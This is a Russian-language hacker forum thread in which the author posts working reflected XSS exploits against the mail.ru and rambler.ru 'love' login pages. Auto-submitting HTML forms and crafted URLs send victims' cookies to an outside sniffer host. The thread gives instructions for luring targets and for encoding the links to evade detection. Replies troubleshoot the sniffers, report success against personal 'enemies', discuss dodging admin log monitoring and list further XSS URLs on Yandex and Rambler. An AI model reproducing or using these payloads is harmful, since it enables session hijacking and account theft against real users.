Гы гы ... долго же вы ждали темы как ломать эти почтовики =)

Старый добрый дядя slider вам расскроет тайну :)Да.. да... прям возьмём и угоним сессию..

Короче ... дело было вечером .. делать было нечего..
и полез я искать уязвимости на этих почтовиках..

После многих часов поиска (уважайте чужой труд! ;) ) нашол таки...
в файле http://love.mail.ru/my/login.phtml скрытую строку:
<input type="hidden" name="tcurl">

Да да... именно она слабое звено!...
паразитка такая не фильтруетсо =)

вбил я в нее "><script>alert()</script> и вылез заветный алерт!..


А вот тут по сценарию вам надо дать exploit ))
С переадрессацией и со всеми наворотами ))

А вот он б*я =)

майл.ru

<body onload="p.submit()">
<form action="http://love.mail.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.mail.ru")</script>'>

рамблер.ru


<body onload="p.submit()">
<form action="http://love.rambler.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.rambler.ru")</script>'>


СПРОСИТЕ ВЫ А ПРИЧЁМ ТУТ ПОЧТОВИК mail.ru и rambler.ru ?

А вот причём... кука прийдёт и от лов и от майла! =)
Так что статейка думаю многим пригодистя =)

Ну что.. время пошло кто не успел тот опоздал... =)
Торопитесь время акции ограничего =)

С уважением slider


Ахх да... как юзать ))
Сохраняете этот "сплойт" в html и качаете на народ.ru
далее даёте ссылку комунить на свой "скрипт"... ))
Удачи!..

Вот вам ещё скриптеГ =)

http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>

Чтоб было меньше палева .. кодируем это .. и получисо чтот типа того!..

http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3C%73%63%72%69%70%74%3E%6 1%6C%65%72%74%28%29%3C%2F%73%63%72%69%70%74%3E

Засекаем время сколько бага проживет =)

Отпишитесь хоть.. КОМУ пригодилось! =)

http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3Cscript%3Ealert('12');%3 C/script%3E%22!--%3C

или так http://love.mail.ru/my/login.phtml?tcurl="><script>document.location='http://forum.antichat.ru';</script><!--"
<a href='http://love.mail.ru/my/login.phtml?tcurl="><script>document.location=\'http://forum.antichat.ru\'</script><!--"'>ФОрум</a>

я конечно не понял точно как сделал слайдер
но вот как я сделел

Мда только жаль что я ен умею этим пользоваться..

"Торопитесь время акции ограничего =)"
Мда

http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>

И так можно использовать!!! =)
но это как то банально!

Я что-то не понял это активная XSS, и где надо запостить этот текст http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>?
Извените за тупые вопросы просто с XSS плохо разбираюсь.

Я что-то не понял это активная XSS, и где надо запостить этот текст http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>?
Извените за тупые вопросы просто с XSS плохо разбираюсь.Обычная пассивная xss
Жертва должна перейти по ссылке, либо быть перенаправленной на нее

Только что опробовал, сделал все как по учебнику ,скрипт вроде рабочий,..но мля куки на снифер не летят.
Кто нить знает в чем причина? В снифере, как была одна запись ...так одна и есть. Mожет я не правильно снифер зарегал ? В " Картинка" что нано писать? Изаиняюсь за дебильные вопросы........ :confused:

Походу плюсик начал фильтроваться ;)
Вернее + просто вырезается, а если пытаешься замаскировать, то отрезается все что идет после плюса.

НАврал - простое урл шифрование плюса и все катит.

эх жаль в письме низя"ВНИМАНИЕ!
Данное письмо содержит потенциально опасный Html-код,
заблокированный автоматической системой безопасности."
а то ссылку давать не каждый пойдёт-то...

Пробовал! Пашет! Пока бага актуальна!

Все,.. пашет! Спасибо Slider ! Наконец то я достал врага.




Сам ты чайник....я просто покурил вчера больше чем надо...

а никто не подскажет какой нить альтернативный сниффер просто я никак не могу завести свой на античате

http://xss.netsec.ru

Респект...Sliderу

Гы гы... значит всё таки не зря старалсо! =)

Красавец!!!!!!!!!! Супер! Отлично

Spaсибо, все ок!!!

Все вроде делаю, как указано на первой странице. Чего то не прокатывает. Видимо делаю что-то не так. Ваш рабочий вариант на данный момент отличается от оного на первой странице?

вчера "+" фильтровать начали, но с concat все нормально пашет. советую ссылку обработать такой функией:

function full_encode($str)
{
$result = '';
for ($i=0; $i < strlen($str); $i++)
$result .= ("%" . bin2hex(substr($str, $i, 1)));

return strtoupper($result);

}


так проще впарить. думаю Вам не надо объяснять почему так...

Ничё там не фильтруется!...
всё работает!

пиши видео под зачет)))пока актуально))) а то там нового ничего нет) правда у меня все же пишет опасный код))

А у меня куки на сниффер только от фаерфокса почемуто приходят...

"пиши видео под зачет)))пока актуально))) а то там нового ничего нет) правда у меня все же пишет опасный код))"
Точно...

Ну почему тогда у меня ничего не пашет. Выдает:

Ошибка: Неверно указан логин или пароль

А наряду с полями для логина и пароля выдает (">) без скобок

Ничё там не фильтруется!...
всё работает!

Фильтруется.
"><script>alert(document.cookie);</script><br style=" покажет куки
"><script>alert(document.cookie+'dead-plus');</script><br style=" промолчит

откроем исходник и увидим:
name="tcurl" value=""><script>alert(document.cookie "dead-plus");</script> ("+" исчез)

только что еще раз затестил

ХЗ ..куки приходят!

"Ну почему тогда у меня ничего не пашет. Выдает:

Ошибка: Неверно указан логин или пароль

А наряду с полями для логина и пароля выдает (">) без скобок"
Куки все равно приходят...
СДЕЛАЙте ВИДИО!

ЖДИТЕ!.. =)

ХЗ ..куки приходят!
ну правильно, если он у тебя записан кодом то все нормально, но сам символ без кодировки фильтром режется. правда подходит только urlencode, в других кодировках вообще плюс и всё что после него отсекается.

жива еще Xss?

ААА..видио..быстрей!!!

для самых нетерпеливых =)

вот моя версия видео) http://armed.h12.ru/xss.rar

безусловно, все права принадлежат slider'y, поэтому по первому требованию файл уберу.

сорри, наверное немного косячно) но у меня это первый такой мувик)

ссылка не совсем прямая, если так можно сказать)
при переходе появиться сообщение что файл находится на сервере бесплатного хостинга, там ссылку и нажмете...)

Через чо у тебя это видео посмотреть-то можно??

нда..а нормальным чем-нибудь мог записать? или ты с учетом на то что нам кодеки дополнительные качать надо?) лол

ну сорри, на самом деле первый раз это делал, просто запусил ScreenVirtuoso Pro с настройками по дефолту... кодек FMVC/MSVC

DSH 4CC FMVC
VFW Description FM Screen Capture Codec
DSH DirectShow CLSID CLSID_AVIDec {CF49D4E0-1115-11CE-B03A-0020AF0BA770}
REG Driver File F:\WINDOWS\system32\fmcodec.dll
DSH Friendly Name FM Screen Capture Codec
- - Function Decoder
REG Merit 0x00200000
VFW Name FMCodec
- - Type VFW

а где его взять можно?

m17 воруеш мой хлеб! )
Я снял ужо видио!

Для тех кто спорит фильтруются плюсы или нет - возможно что они фильтруются тока ГЕТом, а не ПОСТом =)
Я ГЕТом вчера проверял - плюсик начал фильтроваться. ПОСТом не проверял.
Но я не думаю что админы на мейле такие криворукие что поставили фильтр тока на ГЕТ....

мое видео тож лежит, всё там же, теперь кодек DivX, у всех должно показывать, признаю до работы sliderа мне далеко, поэтому еще раз повторяю: по первому требованию удалю!

Для тех кто спорит фильтруются плюсы или нет - возможно что они фильтруются тока ГЕТом, а не ПОСТом =)
Я ГЕТом вчера проверял - плюсик начал фильтроваться. ПОСТом не проверял.
Но я не думаю что админы на мейле такие криворукие что поставили фильтр тока на ГЕТ....
обычно админы так косячат когда на сервере меняют значение register_globals. всех PHP кодеров просто так учат, так пишутся все книги про PHP. принято что register_globals включено, хоть это и создает потенциальные ошибки. в том что пишу я лично, я не позволяю пользователю передавать параметр методом отличным от того что по умолчанию на форме. от киддисов всяких помогает....

Качаем! =)
http://rapidshare.com/files/6208886/hack.rar

БОЛЬшОЙ ТЕБЕ РЕСП Чувак.....спомощьЮ тебе я открыл горькую правду...((( ......спасибо тебе большое!!!!!!

Качаем! =)
http://rapidshare.com/files/6208886/hack.rar

да Чувак, куча респектов тебе!!! все получилось, все отлично!!

Спасибо =)
Юзайте пока не прикрыли! =)

А античатовский сниффер сейчас работает или нет? У меня там пусто - ничего неприходит...
Отметить все >>
Всего записей: 1.
Новые записи сейчас выводятся первыми. Перевернуть?
: Показать ВСЕ
: Спрятать видимые записи с пустыми QUERY
Или дыру уже прикрыли?

А античатовский сниффер сейчас работает или нет? У меня там пусто - ничего неприходит...

Или дыру уже прикрыли?

там тебе может быть надо просто нажать на "перевернуть" и все появится... папробуй...

Бага работает ПРОВЕРИЛ!

Бага работает ПРОВЕРИЛ!
ПРОДЕРЖАЛАСЬ ДВА ДНЯ ... ))
Юзаем дальше )

Дай бог ей месяц жизни)

парни, может ее обратно в приват? тогда оч. долго будет жить. я серьезно.... ну как?

Ех народ Прощай баг=(((
Его уже прикрыли сёня утром работал а щас не работает уже ппц.
Админы на mail.ru Ну просто нежить какая то=)

ППЦ =)
Всё... ладно .. надеюсь вы успели воспользоватсо! =)

Незабываем что есть дыра ещё и на rambler.ru =)

На трамблере уже тоже прикрыли, вроде.

ну молодцы ребята, что тут скажешь... баги слишком хорошо вылавливаются, когда запрос с XSS передается в открытом виде а не после urlencode или полного кодирования... я сам писал когда-то парсер который искал в логе сервака теги типа <script> и сразу стучал на мыло. поэтому, при желании, админы могли бы отлавливать все потенциальные XSSки сразу же, главное установить минимум попыток XSS для определенной переменной чтобы оградиться от ложных срабатываний.

Блин,...вчера только разобрался....обрадовался было,что завтра устрою врагам парку..
а сегодня бага ,что на mail'е ,что на rambler'e уже прикрыта..Спасибо конечно Slider'у
,но блин...эти гребанные админы с mail . Есть какое нибудь противоядие против них, на будующее
,что-бы не так быстро все заканчивалось (кроме конечно перевода темы в приват) ?

Да, только жалко что я этого не умею делать=)

Я думаю нужно как то обходить этого стукача-отлавливателя.....иначе неодна xss непродержится долгл..даже если одни запрос или отчёт пришёл что на такой то такой то странице был замечен <script></script> то всё уже...

Я думаю нужно как то обходить этого стукача-отлавливателя.....иначе неодна xss непродержится долгл..даже если одни запрос или отчёт пришёл что на такой то такой то странице был замечен <script></script> то всё уже...

ни в коем случае не отправлять открытым текстом, закодировать ессесена, табуляций навтыкать, проблема только в том что написание скрипта который избавиться от всего этого мусора не составляет труда, и поэтому если уж они таким образом что-то отлавливают, то должно быть это сделано положенным образом...

Постараюсь как можно короче!....
Кто знает тот поймёт! ;)

http://top.mail.ru/stat/index.php?url="><script>alert(document.cookie)</script>

XSS на Яндексе, можеет кому-нибудь пригодиться...:

http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E


И еше на Рамблере:
http://vision.rambler.ru/actions/piece.html?album=1%22%3E%3Cscript%3Ealert()%3C/script%3E

Ток что нашол :)http://foto.rambler.ru/topics/7316410/date/?p=15"><script>alert(document.cookie)</script>

http://icq.rambler.ru/srch?words=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

у меня беда. все сделал правильно. тестировал работает или нет, все нормально пришло на снифер http://na-s.ru и все после этого уже больше не сливало нечего на снифер, пишет база пуста и все, как исправить?? мб из-за браузера??

у меня беда. все сделал правильно. тестировал работает или нет, все нормально пришло на снифер http://na-s.ru и все после этого уже больше не сливало нечего на снифер, пишет база пуста и все, как исправить?? мб из-за браузера??

смари как ево обычный куки стойт и через него смари!

НЕ а почему первый раз получилось и все больше не проходит?? Залейте плз уже готовые файлы, которые надо добавлять на сайт. мб я чето не так делаю

НЕ а почему первый раз получилось и все больше не проходит?? Залейте плз уже готовые файлы, которые надо добавлять на сайт. мб я чето не так делаю
пришло? :confused: 2 года уже прошло. оч сомневаюсь